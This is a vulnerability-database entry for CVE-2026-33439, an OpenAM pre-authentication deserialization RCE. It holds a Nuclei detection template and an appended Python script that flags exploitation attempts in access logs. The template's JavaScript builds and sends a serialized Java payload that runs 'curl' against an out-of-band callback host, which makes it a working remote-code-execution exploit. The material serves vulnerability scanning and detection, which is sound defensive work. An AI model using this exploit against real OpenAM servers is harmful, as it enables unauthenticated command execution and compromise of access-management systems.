OpenAM <= 16.0.5 - Pre-Auth RCE via jato.clientSession Deserialization
CVE-2026-33439
Early Release
Description
Open Access Management (OpenAM) is an access management solution. Prior to 16.0.6, OpenIdentityPlatform OpenAM is vulnerable to pre-authentication Remote Code Execution (RCE) via unsafe Java deserialization of the jato.clientSession HTTP parameter. This bypasses the WhitelistObjectInputStream mitigation that was applied to the jato.pageSession parameter after CVE-2021-35464. This vulnerability is fixed in 16.0.6.
Severity
Critical
CVSS Score
9.8
Exploit Probability
8%
Affected Product
openam
Published Date
April 14, 2026
Template Author
dhiyaneshdk
CVE-2026-33439.yaml
id: CVE-2026-33439

info:
  name: OpenAM <= 16.0.5 - Pre-Auth RCE via jato.clientSession Deserialization
  author: DhiyaneshDk
  severity: critical
  description: |
    Open Access Management (OpenAM) is an access management solution. Prior to 16.0.6, OpenIdentityPlatform OpenAM is vulnerable to pre-authentication Remote Code Execution (RCE) via unsafe Java deserialization of the jato.clientSession HTTP parameter. This bypasses the WhitelistObjectInputStream mitigation that was applied to the jato.pageSession parameter after CVE-2021-35464. This vulnerability is fixed in 16.0.6.
  impact: |
    An unauthenticated attacker can achieve arbitrary command execution on the server by sending a crafted serialized Java object as the jato.clientSession GET/POST parameter to any JATO ViewBean endpoint whose JSP contains <jato:form> tags (e.g., the Password Reset pages).
  remediation: Upgrade to OpenAM 16.0.6 or later.
  reference:
    - https://www.hacktron.ai/blog/openam-deserialization-pre-auth-rce
    - https://github.com/OpenIdentityPlatform/OpenAM/security/advisories/GHSA-2cqq-rpvq-g5qj
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-33439
    epss-score: 0.07964
    epss-percentile: 0.92082
    cwe-id: CWE-502
  metadata:
    verified: true
    max-request: 2
    vendor: openidentityplatform
    product: openam
    shodan-query: http.title:"OpenAM"
    fofa-query: title="OpenAM"
  tags: cve,cve2026,openam,deserialization,rce,jato,oast,oob

flow: http(1) && javascript(1)

http:
  - method: GET
    path:
      - "{{BaseURL}}/openam/ui/PWResetUserValidation"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "OpenAM","tfUserAttr")'
        condition: and
        internal: true

javascript:
  - code: |
      var net = require('nuclei/net');
      var P = "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";
      var CMD_OFF = 5114; // "curl http://REPLACEME_OAST_PLACEHOLDER_URL" string start
      var LEN_OFF = 5110; // CONSTANT_Utf8 length field (2 bytes, big-endian)
      var ARR_OFF = 4660; // byte[] array length for the embedded class file (4 bytes, big-endian)
      var OLD_LEN = 42;   // Original placeholder string length in bytes
      var OLD_ARR = 968;  // Original class file size in bytes
      var cmd = "curl http://" + interactsh;
      var delta = cmd.length - OLD_LEN;
      function h(s) {
        var o = "";
        for (var i = 0; i < s.length; i++) {
          var c = s.charCodeAt(i).toString(16);
          o += c.length < 2 ? "0" + c : c;
        }
        return o;
      }
      var newHex = h(cmd);
      var oldHexLen = OLD_LEN * 2;
      var px = P.substring(0, CMD_OFF) + newHex + P.substring(CMD_OFF + oldHexLen);
      var ul = cmd.length.toString(16);
      while (ul.length < 4) ul = "0" + ul;
      px = px.substring(0, LEN_OFF) + ul + px.substring(LEN_OFF + 4);
      var al = (OLD_ARR + delta).toString(16);
      while (al.length < 8) al = "0" + al;
      px = px.substring(0, ARR_OFF) + al + px.substring(ARR_OFF + 8);
      var ba = [];
      for (var i = 0; i < px.length; i += 2) {
        ba.push(parseInt(px.substring(i, i + 2), 16));
      }
      var T = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
      var b = "";
      for (var i = 0; i < ba.length; i += 3) {
        var a0 = ba[i], a1 = i+1<ba.length?ba[i+1]:0, a2 = i+2<ba.length?ba[i+2]:0;
        b += T[(a0>>2)&63];
        b += T[((a0<<4)|(a1>>4))&63];
        b += i+1<ba.length ? T[((a1<<2)|(a2>>6))&63] : "=";
        b += i+2<ba.length ? T[a2&63] : "=";
      }
      var payload = b.split("+").join("-").split("/").join("_").split("=").join("");
      var ct = (tport === "443") ? "tls" : "tcp";
      var conn = net.Open(ct, thost + ":" + tport);
      var req = "GET /openam/ui/PWResetUserValidation?jato.clientSession=" + payload +
        " HTTP/1.1\r\nHost: " + thost + ":" + tport +
        "\r\nConnection: close\r\n\r\n";
      conn.SendHex(h(req));
      var resp = conn.RecvString(4096);
      conn.Close();
      Export(resp);
    args:
      thost: "{{Host}}"
      tport: "{{Port}}"
      interactsh: "{{interactsh-url}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
# digest: 490a004630440220593047ba0f8503286c1a9d24bcad19a42004a4710098665a5e4d2ec887faf4f502206cca5a349f451f2a3ea53a95ce55c082369fb64ff6ea1d3556c36fe9c8387062:922c64590222798bb761d5b6d8e72950
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
CVE-2026-33439
CWE ID:
CWE-502
Remediation Steps
Upgrade to OpenAM 16.0.6 or later.
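The template above confirms exposure by triggering an out-of-band callback; a defender can look for the same traffic in web-server access logs. The following Python script is an added example, not part of the Nuclei template or of OpenAM: it parses combined-format log lines (constructed samples), decodes the jato.clientSession and jato.pageSession parameters (including the URL-safe, unpadded base64 the template emits), checks for the Java serialization stream header, pulls class names out of the stream's class descriptors and flags any outside an allowlist. The allowlist contents and the class name com.example.UnexpectedGadget are illustrative assumptions, not OpenAM's real WhitelistObjectInputStream entries.

```python
import base64, binascii, re
from urllib.parse import parse_qs, urlsplit
JAVA_SER_MAGIC = b"\xac\xed\x00\x05"  # Java STREAM_MAGIC + STREAM_VERSION
JATO_PARAMS = ("jato.clientSession", "jato.pageSession")
# Illustrative allowlist (assumption, not OpenAM's real WhitelistObjectInputStream list): seed it from your own legitimate JATO traffic.
EXPECTED_CLASSES = {"java.util.HashMap", "java.lang.String", "java.util.ArrayList"}
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" \d{3}')

def decode_b64_any(value):  # standard or URL-safe base64; the template strips '=' padding
    value = value.replace("-", "+").replace("_", "/")
    try:
        return base64.b64decode(value + "=" * (-len(value) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None

def java_class_names(blob):  # names from TC_CLASSDESC records: 0x72, u2 length, name bytes
    names = []
    for m in re.finditer(rb"\x72([\x00-\xff]{2})([A-Za-z0-9_.$\[;]{1,300})", blob):
        if (n := int.from_bytes(m.group(1), "big")) and len(m.group(2)) >= n:
            names.append(m.group(2)[:n].decode("ascii"))
    return names

def inspect_target(target):  # finding if a JATO parameter holds a stream naming unexpected classes
    parts = urlsplit(target)
    for name in JATO_PARAMS:
        for raw in parse_qs(parts.query).get(name, []):
            blob = decode_b64_any(raw)
            if blob and blob.startswith(JAVA_SER_MAGIC):
                unexpected = sorted(set(java_class_names(blob)) - EXPECTED_CLASSES)
                if unexpected:
                    return {"param": name, "path": parts.path, "classes": unexpected}
    return None

def scan_log(lines):  # run inspect_target over every parseable access-log line
    out = []
    for m in filter(None, map(LOG_RE.match, lines)):
        if hit := inspect_target(m.group("target")):
            out.append({**hit, "ip": m.group("ip")})
    return out

def sample_stream(*classes):  # constructed test data: header + one TC_OBJECT/TC_CLASSDESC per class
    body = b"".join(b"sr" + len(c).to_bytes(2, "big") + c.encode() + b"\x00" * 9 for c in classes)
    return base64.urlsafe_b64encode(JAVA_SER_MAGIC + body).decode().rstrip("=")

SAMPLE_LOG = [  # constructed lines, not real traffic; "com.example.UnexpectedGadget" is a placeholder
    '10.0.0.5 - - [14/Apr/2026:10:00:00 +0000] "GET /openam/ui/PWResetUserValidation?jato.pageSession='
    + sample_stream("java.util.HashMap") + ' HTTP/1.1" 200 1234',
    '203.0.113.7 - - [14/Apr/2026:10:00:01 +0000] "GET /openam/ui/PWResetUserValidation?jato.clientSession='
    + sample_stream("com.example.UnexpectedGadget", "java.util.HashMap") + ' HTTP/1.1" 500 87',
]
```

Legitimate JATO requests also carry serialized objects in jato.pageSession, so the presence of a stream alone is not an indicator; the unexpected-class check is what separates an exploitation attempt from normal traffic.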